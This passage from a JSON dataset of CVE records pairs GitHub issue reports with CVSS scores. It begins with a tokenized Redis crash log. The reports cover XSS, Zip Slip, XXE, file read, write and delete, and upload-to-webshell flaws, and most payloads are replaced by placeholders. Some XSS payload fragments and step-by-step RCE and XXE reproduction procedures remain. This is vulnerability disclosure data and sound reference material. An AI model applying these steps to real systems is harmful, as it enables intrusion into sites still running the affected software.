RA NUMBERTAG RB NUMBERTAG fc NUMBERTAG d NUMBERTAG RC NUMBERTAG d4daaa NUMBERTAG c0 RD NUMBERTAG d4dacfdb NUMBERTAG RDI NUMBERTAG fc NUMBERTAG eca NUMBERTAG RSI NUMBERTAG RBP NUMBERTAG fc NUMBERTAG eca NUMBERTAG RSP NUMBERTAG fff5c0d1c NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG eb R NUMBERTAG eb R NUMBERTAG R NUMBERTAG d4dacfa NUMBERTAG R NUMBERTAG fff5c0d1dac R NUMBERTAG RIP NUMBERTAG d4daa NUMBERTAG e9 EFL NUMBERTAG CSGSFS NUMBERTAG b NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5f NUMBERTAG c NUMBERTAG fde NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5d NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5b NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c5a NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG e NUMBERTAG e NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4da NUMBERTAG c6f NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fff5c0d1dac NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4dacfa NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fff5c0d1c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fc NUMBERTAG d NUMBERTAG c NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG fc NUMBERTAG d NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG c NUMBERTAG fde NUMBERTAG M NUMBERTAG No NUMBERTAG fff5c0d1c NUMBERTAG d4dacfa NUMBERTAG MODULES INFO OUTPUT FAST MEMORY TEST NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated NUMBERTAG M NUMBERTAG No NUMBERTAG Bio thread for job type NUMBERTAG terminated Preparing to test memory region NUMBERTAG d4dace NUMBERTAG bytes) Preparing to test memory region NUMBERTAG d4db8e NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG aa2c NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG b NUMBERTAG d 
NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG ba2e NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG c NUMBERTAG f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG d NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG e0da NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG e2f NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG eca NUMBERTAG bytes) Preparing to test memory region NUMBERTAG fc NUMBERTAG ecd NUMBERTAG bytes) .O.O.O.O.O.O.O.O.O.O.O Fast memory test PASSED, however your memory can still be broken. Please run a memory test for several hours if possible. DUMPING CODE AROUND EIP Symbol: je_large_dalloc (base NUMBERTAG d4daa NUMBERTAG c0) Module: PATHTAG NUMBERTAG base NUMBERTAG d4da NUMBERTAG d r p /tmp/dump.hex /tmp/dump.bin $ objdump adjust vma NUMBERTAG d4daa NUMBERTAG c0 D b binary m i NUMBERTAG tmp/dump.bin NUMBERTAG M NUMBERTAG No NUMBERTAG dump of function (hexdump of NUMBERTAG bytes): APITAG Function at NUMBERTAG d4daa NUMBERTAG f0 is APITAG Function at NUMBERTAG d4daa NUMBERTAG f NUMBERTAG is je_arena_extents_dirty_dalloc === REDIS BUG REPORT END. Make sure to include from START to END. === version information ERRORTAG",
  53712. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  53713. "severity": "HIGH",
  53714. "baseScore": 7.5,
  53715. "impactScore": 3.6,
  53716. "exploitabilityScore": 3.9
  53717. },
  53718. {
  53719. "CVE_ID": "CVE-2020-21493",
  53720. "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/3",
  53721. "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/3",
  53722. "Repo_new": "rayfalling/xiuno-docker",
  53723. "Issue_Created_At": "2019-12-05T15:07:20Z",
  53724. "description": "Username enumeration vulnerability. FILETAG line NUMBERTAG CODETAG The login response reveals whether the supplied account exists, so valid usernames can be discovered by iterating the login parameter email=...& PoC: CODETAG Response: CODETAG",
  53725. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  53726. "severity": "MEDIUM",
  53727. "baseScore": 5.3,
  53728. "impactScore": 1.4,
  53729. "exploitabilityScore": 3.9
  53730. },
  53731. {
  53732. "CVE_ID": "CVE-2020-21494",
  53733. "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/4",
  53734. "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/4",
  53735. "Repo_new": "rayfalling/xiuno-docker",
  53736. "Issue_Created_At": "2019-12-07T00:18:13Z",
  53737. "description": "Storage Cross Site Scripting Attack (XSS) Vulnerability. URL\uff1a FILETAG FILETAG line NUMBERTAG CODETAG FILETAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG CODETAG FILETAG line NUMBERTAG APITAG The doctype defaults to NUMBERTAG The data packet is modified to APITAG xss payload can be triggered. POC: CODETAG FILETAG FILETAG FILETAG \u5b58\u50a8\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff08XSS\uff09\u6f0f\u6d1e URL\uff1a FILETAG FILETAG NUMBERTAG CODETAG FILETAG NUMBERTAG ERRORTAG FILETAG NUMBERTAG CODETAG FILETAG NUMBERTAG APITAG doctype NUMBERTAG APITAG payload. POC: CODETAG",
  53738. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53739. "severity": "MEDIUM",
  53740. "baseScore": 6.1,
  53741. "impactScore": 2.7,
  53742. "exploitabilityScore": 2.8
  53743. },
  53744. {
  53745. "CVE_ID": "CVE-2020-21495",
  53746. "Issue_Url_old": "https://github.com/wanghaiwei/xiuno-docker/issues/5",
  53747. "Issue_Url_new": "https://github.com/rayfalling/xiuno-docker/issues/5",
  53748. "Repo_new": "rayfalling/xiuno-docker",
  53749. "Issue_Created_At": "2019-12-07T01:01:39Z",
  53750. "description": "Storage Cross Site Scripting Attack (XSS) Vulnerability . /admin/?setting base.htm sitename sitebrief PATHTAG line NUMBERTAG APITAG PATHTAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG APITAG PATHTAG line NUMBERTAG ERRORTAG FILETAG line NUMBERTAG APITAG FILETAG line NUMBERTAG CODETAG poc: ERRORTAG FILETAG FILETAG FILETAG",
  53751. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53752. "severity": "MEDIUM",
  53753. "baseScore": 6.1,
  53754. "impactScore": 2.7,
  53755. "exploitabilityScore": 2.8
  53756. },
  53757. {
  53758. "CVE_ID": "CVE-2020-21503",
  53759. "Issue_Url_old": "https://github.com/caokang/waimai/issues/15",
  53760. "Issue_Url_new": "https://github.com/caokang/waimai/issues/15",
  53761. "Repo_new": "caokang/waimai",
  53762. "Issue_Created_At": "2019-12-07T18:45:05Z",
  53763. "description": "Payment logic flaw: the number of points charged is taken from the client request and can be tampered with. First choose to exchange points for a product; for example, this product requires NUMBERTAG points. FILETAG FILETAG Then capture the request. FILETAG Change the value of the credit parameter to NUMBERTAG FILETAG FILETAG The product is obtained for free. FILETAG",
  53764. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  53765. "severity": "HIGH",
  53766. "baseScore": 7.5,
  53767. "impactScore": 3.6,
  53768. "exploitabilityScore": 3.9
  53769. },
  53770. {
  53771. "CVE_ID": "CVE-2020-21504",
  53772. "Issue_Url_old": "https://github.com/caokang/waimai/issues/16",
  53773. "Issue_Url_new": "https://github.com/caokang/waimai/issues/16",
  53774. "Repo_new": "caokang/waimai",
  53775. "Issue_Created_At": "2019-12-08T09:45:05Z",
  53776. "description": "Three XSS vulnerabilities found in Waimai Super Cms. In waimai Super Cms master, there is an XSS vulnerability via the APITAG and PATHTAG Referer parameter, APITAG page parameter NUMBERTAG Payload: Referer: '\"> APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG FILETAG NUMBERTAG Payload: Referer: '\"> APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG FILETAG NUMBERTAG Payload: POST APITAG HTTP NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG Trident NUMBERTAG r NUMBERTAG like Gecko Referer: URLTAG Cookie: APITAG Connection: keep alive Host: localhost Content Length NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Content Type: application/x www form urlencoded FILETAG FILETAG",
  53777. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53778. "severity": "MEDIUM",
  53779. "baseScore": 6.1,
  53780. "impactScore": 2.7,
  53781. "exploitabilityScore": 2.8
  53782. },
  53783. {
  53784. "CVE_ID": "CVE-2020-21522",
  53785. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/418",
  53786. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/418",
  53787. "Repo_new": "halo-dev/halo",
  53788. "Issue_Created_At": "2019-12-11T10:35:33Z",
  53789. "description": "Zip Slip directory traversal in the backend theme installer. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG Then start an HTTP service to serve the crafted archive and use the theme-installation feature to install it CODETAG The file FILETAG is then extracted into the /tmp directory, outside the intended theme directory. FILETAG An attacker can therefore overwrite files such as .ftl templates or the user's .bashrc and ultimately obtain operating-system-level access.",
  53790. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53791. "severity": "CRITICAL",
  53792. "baseScore": 9.8,
  53793. "impactScore": 5.9,
  53794. "exploitabilityScore": 3.9
  53795. },
  53796. {
  53797. "CVE_ID": "CVE-2020-21524",
  53798. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/423",
  53799. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/423",
  53800. "Repo_new": "halo-dev/halo",
  53801. "Issue_Created_At": "2019-12-11T11:44:59Z",
  53802. "description": "XML external entity (XXE) injection in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG The XML external entity (XXE) APITAG vulnerability can be used to probe the internal network, read local files, cause denial of service, etc. Demonstration (file read): first construct a malicious XML file which, when parsed, reads the APITAG file and places the result in the category-list field. FILETAG ERRORTAG Upload this file to the system and obtain its path APITAG Then use the WordPress blog import interface to trigger the vulnerability ERRORTAG After sending the above request, the contents of the APITAG file appear in the backend category list. FILETAG Recommended fix: disable DTD/external entity resolution on the XML parser, e.g. APITAG (\" URLTAG \", true) ; CVETAG",
  53803. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  53804. "severity": "CRITICAL",
  53805. "baseScore": 9.1,
  53806. "impactScore": 5.2,
  53807. "exploitabilityScore": 3.9
  53808. },
  53809. {
  53810. "CVE_ID": "CVE-2020-21525",
  53811. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/420",
  53812. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/420",
  53813. "Repo_new": "halo-dev/halo",
  53814. "Issue_Created_At": "2019-12-11T10:52:58Z",
  53815. "description": "An Arbitrary File reading in the backend(bypass the Path check). APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG So I can read any file using the following message FILETAG CODETAG",
  53816. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  53817. "severity": "HIGH",
  53818. "baseScore": 7.5,
  53819. "impactScore": 3.6,
  53820. "exploitabilityScore": 3.9
  53821. },
  53822. {
  53823. "CVE_ID": "CVE-2020-21526",
  53824. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/421",
  53825. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/421",
  53826. "Repo_new": "halo-dev/halo",
  53827. "Issue_Created_At": "2019-12-11T11:00:30Z",
  53828. "description": "An Arbitrary file writing vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system",
  53829. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53830. "severity": "CRITICAL",
  53831. "baseScore": 9.8,
  53832. "impactScore": 5.9,
  53833. "exploitabilityScore": 3.9
  53834. },
  53835. {
  53836. "CVE_ID": "CVE-2020-21527",
  53837. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/422",
  53838. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/422",
  53839. "Repo_new": "halo-dev/halo",
  53840. "Issue_Created_At": "2019-12-11T11:06:14Z",
  53841. "description": "Arbitrary file deletion in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply [x] BUG feedback The backend has a backup function. The request that deletes a backup file does not restrict the path, so through directory traversal any file on the system can be deleted. CODETAG My backup file directory is APITAG . The above request deletes the FILETAG file in the APITAG directory",
  53842. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
  53843. "severity": "HIGH",
  53844. "baseScore": 7.7,
  53845. "impactScore": 4.0,
  53846. "exploitabilityScore": 3.1
  53847. },
  53848. {
  53849. "CVE_ID": "CVE-2020-21547",
  53850. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/114",
  53851. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/114",
  53852. "Repo_new": "saitoha/libsixel",
  53853. "Issue_Created_At": "2019-12-13T13:53:59Z",
  53854. "description": "heap buffer overflow in dither_func_fs at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in dither_func_fs at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  53855. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53856. "severity": "HIGH",
  53857. "baseScore": 8.8,
  53858. "impactScore": 5.9,
  53859. "exploitabilityScore": 2.8
  53860. },
  53861. {
  53862. "CVE_ID": "CVE-2020-21548",
  53863. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/116",
  53864. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/116",
  53865. "Repo_new": "saitoha/libsixel",
  53866. "Issue_Created_At": "2019-12-16T04:32:36Z",
  53867. "description": "heap buffer overflow in sixel_encode_highcolor at APITAG img2sixel NUMBERTAG There is a heap buffer overflow in sixel_encode_highcolor at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  53868. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53869. "severity": "HIGH",
  53870. "baseScore": 8.8,
  53871. "impactScore": 5.9,
  53872. "exploitabilityScore": 2.8
  53873. },
  53874. {
  53875. "CVE_ID": "CVE-2020-21564",
  53876. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/91",
  53877. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/91",
  53878. "Repo_new": "pluck-cms/pluck",
  53879. "Issue_Created_At": "2019-12-19T15:37:06Z",
  53880. "description": "Pluck NUMBERTAG admin backend: authenticated remote code execution via file upload. Proof: step1: login > pages > manage files; upload a .htaccess file that turns APITAG into FILETAG FILETAG step2: move FILETAG to the trash FILETAG step3: upload the shell code FILETAG ERRORTAG FILETAG step4: view FILETAG FILETAG",
  53881. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  53882. "severity": "HIGH",
  53883. "baseScore": 8.8,
  53884. "impactScore": 5.9,
  53885. "exploitabilityScore": 2.8
  53886. },
  53887. {
  53888. "CVE_ID": "CVE-2020-21564",
  53889. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/83",
  53890. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/83",
  53891. "Repo_new": "pluck-cms/pluck",
  53892. "Issue_Created_At": "2019-10-21T09:08:10Z",
  53893. "description": "Pluck NUMBERTAG de NUMBERTAG admin background exists a remote command execution vulnerability in the management file interface.. Upload these two files in the management file interface. FILETAG Access in FILETAG . FILETAG Successful execution. Then upload attack code. FILETAG FILETAG Successfully obtained the shell. Poc\uff1a APITAG",
  53894. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  53895. "severity": "HIGH",
  53896. "baseScore": 8.8,
  53897. "impactScore": 5.9,
  53898. "exploitabilityScore": 2.8
  53899. },
  53900. {
  53901. "CVE_ID": "CVE-2020-21572",
  53902. "Issue_Url_old": "https://github.com/trgil/gilcc/issues/1",
  53903. "Issue_Url_new": "https://github.com/trgil/gilcc/issues/1",
  53904. "Repo_new": "trgil/gilcc",
  53905. "Issue_Created_At": "2019-12-22T10:54:02Z",
  53906. "description": "Out-of-bounds array access and buffer overflow. Hi, I found an out-of-bounds array access and a buffer overflow in APITAG :) FILETAG",
  53907. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  53908. "severity": "HIGH",
  53909. "baseScore": 7.5,
  53910. "impactScore": 3.6,
  53911. "exploitabilityScore": 3.9
  53912. },
  53913. {
  53914. "CVE_ID": "CVE-2020-21573",
  53915. "Issue_Url_old": "https://github.com/abhijitnathwani/image-processing/issues/3",
  53916. "Issue_Url_new": "https://github.com/abhijitnathwani/image-processing/issues/3",
  53917. "Repo_new": "abhijitnathwani/image-processing",
  53918. "Issue_Created_At": "2019-12-23T07:55:31Z",
  53919. "description": "Stack exhaustion. Hi, I only modified the input image file and caused stack exhaustion. I think the variable _buffer_ should not be defined as a local (stack) variable; it should be allocated dynamically on the heap. :) FILETAG",
  53920. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53921. "severity": "MEDIUM",
  53922. "baseScore": 5.5,
  53923. "impactScore": 3.6,
  53924. "exploitabilityScore": 1.8
  53925. },
  53926. {
  53927. "CVE_ID": "CVE-2020-21574",
  53928. "Issue_Url_old": "https://github.com/YotsuyaNight/c-http/issues/1",
  53929. "Issue_Url_new": "https://github.com/yotsuyanight/c-http/issues/1",
  53930. "Repo_new": "YotsuyaNight/c-http",
  53931. "Issue_Created_At": "2019-12-24T03:22:05Z",
  53932. "description": "Buffer overflow. Hi APITAG I am interested in this repo, and I tested main.c with a long request such as ( APITAG ) APITAG and the server crashed because of a buffer overflow in APITAG : CODETAG Do you have a solution for this bug? Thanks :)",
  53933. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  53934. "severity": "HIGH",
  53935. "baseScore": 7.5,
  53936. "impactScore": 3.6,
  53937. "exploitabilityScore": 3.9
  53938. },
  53939. {
  53940. "CVE_ID": "CVE-2020-21585",
  53941. "Issue_Url_old": "https://github.com/emlog/emlog/issues/54",
  53942. "Issue_Url_new": "https://github.com/emlog/emlog/issues/54",
  53943. "Repo_new": "emlog/emlog",
  53944. "Issue_Created_At": "2019-12-24T02:25:06Z",
  53945. "description": "emlog NUMBERTAG zip template getshell vulnerability. APITAG Vulnerability in PATHTAG line NUMBERTAG function APITAG $path, $type = 'tpl') { if APITAG FALSE)) { return NUMBERTAG zip = new APITAG if ( APITAG >open($zipfile) !== TRUE) { return NUMBERTAG r = explode('/', $zip APITAG NUMBERTAG dir = isset($r NUMBERTAG r NUMBERTAG switch ($type) { case 'tpl': $re = $zip APITAG . APITAG if (false === $re) return NUMBERTAG break; case 'plugin': $plugin_name = substr($dir NUMBERTAG re = $zip APITAG . $plugin_name . '.php'); //We can upload a zipfile and extract a php webshell later if (false === $re) return NUMBERTAG break; case 'backup': $sql_name = substr($dir NUMBERTAG if APITAG != 'sql') return NUMBERTAG break; case 'update': break; } if (true === APITAG APITAG { $zip APITAG return NUMBERTAG else { return NUMBERTAG POC: FILETAG We upload FILETAG which contains FILETAG Then we access FILETAG APITAG",
  53946. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53947. "severity": "CRITICAL",
  53948. "baseScore": 9.8,
  53949. "impactScore": 5.9,
  53950. "exploitabilityScore": 3.9
  53951. },
  53952. {
  53953. "CVE_ID": "CVE-2020-21588",
  53954. "Issue_Url_old": "https://github.com/lonely-explorer/CoreFTP/issues/1",
  53955. "Issue_Url_new": "https://github.com/lonely-explorer/coreftp/issues/1",
  53956. "Repo_new": "lonely-explorer/CoreFTP",
  53957. "Issue_Created_At": "2020-02-26T13:55:40Z",
  53958. "description": "Core FTP Local DOS Vulnerability. Vulnerability in Core FTP allows a local attacker to cause the server crash. Core FTP LE ver NUMBERTAG APITAG on Windows NUMBERTAG Step APITAG python code: APITAG Step APITAG the content in FILETAG , and paste it in Setup APITAG APITAG editbox. Step APITAG OK button, which results in a crash and the server closes.",
  53959. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  53960. "severity": "MEDIUM",
  53961. "baseScore": 5.5,
  53962. "impactScore": 3.6,
  53963. "exploitabilityScore": 1.8
  53964. },
  53965. {
  53966. "CVE_ID": "CVE-2020-21590",
  53967. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/190",
  53968. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/190",
  53969. "Repo_new": "wuzhicms/wuzhicms",
  53970. "Issue_Created_At": "2020-03-15T04:29:26Z",
  53971. "description": "wuzhicms NUMBERTAG PATHTAG directory traversal vulnerability. A directory traversal vulnerability was discovered in WUZHI CMS NUMBERTAG It allows authenticated remote attackers to list the files in an arbitrary directory. Vulnerable code in PATHTAG ERRORTAG When APITAG is called, the input is sanitized in a single pass, so the nested sequence is reduced rather than rejected: PATHTAG > /...// > /../ Exploit: APITAG",
  53972. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  53973. "severity": "MEDIUM",
  53974. "baseScore": 4.3,
  53975. "impactScore": 1.4,
  53976. "exploitabilityScore": 2.8
  53977. },
  53978. {
  53979. "CVE_ID": "CVE-2020-21594",
  53980. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/233",
  53981. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/233",
  53982. "Repo_new": "strukturag/libde265",
  53983. "Issue_Created_At": "2019-12-24T08:25:45Z",
  53984. "description": "heap buffer overflow in put_epel_hv_fallback when decoding file. heap buffer overflow in put_epel_hv_fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  53985. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53986. "severity": "MEDIUM",
  53987. "baseScore": 6.5,
  53988. "impactScore": 3.6,
  53989. "exploitabilityScore": 2.8
  53990. },
  53991. {
  53992. "CVE_ID": "CVE-2020-21595",
  53993. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/239",
  53994. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/239",
  53995. "Repo_new": "strukturag/libde265",
  53996. "Issue_Created_At": "2019-12-24T11:28:20Z",
  53997. "description": "heap buffer overflow in mc_luma when decoding file. heap buffer overflow in mc_luma when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  53998. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53999. "severity": "MEDIUM",
  54000. "baseScore": 6.5,
  54001. "impactScore": 3.6,
  54002. "exploitabilityScore": 2.8
  54003. },
  54004. {
  54005. "CVE_ID": "CVE-2020-21596",
  54006. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/236",
  54007. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/236",
  54008. "Repo_new": "strukturag/libde265",
  54009. "Issue_Created_At": "2019-12-24T11:22:38Z",
  54010. "description": "global buffer overflow in decode_CABAC_bit when decoding file. global buffer overflow in decode_CABAC_bit when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54011. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54012. "severity": "MEDIUM",
  54013. "baseScore": 6.5,
  54014. "impactScore": 3.6,
  54015. "exploitabilityScore": 2.8
  54016. },
  54017. {
  54018. "CVE_ID": "CVE-2020-21597",
  54019. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/238",
  54020. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/238",
  54021. "Repo_new": "strukturag/libde265",
  54022. "Issue_Created_At": "2019-12-24T11:26:58Z",
  54023. "description": "heap buffer overflow in mc_chroma when decoding file. heap buffer overflow in mc_chroma when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54024. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54025. "severity": "MEDIUM",
  54026. "baseScore": 6.5,
  54027. "impactScore": 3.6,
  54028. "exploitabilityScore": 2.8
  54029. },
  54030. {
  54031. "CVE_ID": "CVE-2020-21598",
  54032. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/237",
  54033. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/237",
  54034. "Repo_new": "strukturag/libde265",
  54035. "Issue_Created_At": "2019-12-24T11:25:26Z",
  54036. "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54037. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54038. "severity": "HIGH",
  54039. "baseScore": 8.8,
  54040. "impactScore": 5.9,
  54041. "exploitabilityScore": 2.8
  54042. },
  54043. {
  54044. "CVE_ID": "CVE-2020-21599",
  54045. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/235",
